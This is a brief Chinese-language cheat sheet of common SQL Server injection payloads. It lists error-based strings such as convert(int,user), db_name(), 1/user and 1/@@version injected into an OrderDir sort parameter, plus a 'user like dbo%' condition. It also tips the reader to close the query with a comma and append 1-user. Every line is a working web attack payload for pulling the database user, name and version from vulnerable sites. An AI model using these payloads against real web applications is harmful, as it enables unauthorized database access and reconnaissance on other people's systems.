一些常用sqlserver的注入 ,/(convert(int,user)) ./db_name() &OrderDir=asc,1/user &OrderDir=asc,1/@@version ExtraeExpression= +and+user+like’dbo%25’ 你直接接个逗号闭合 然后1-user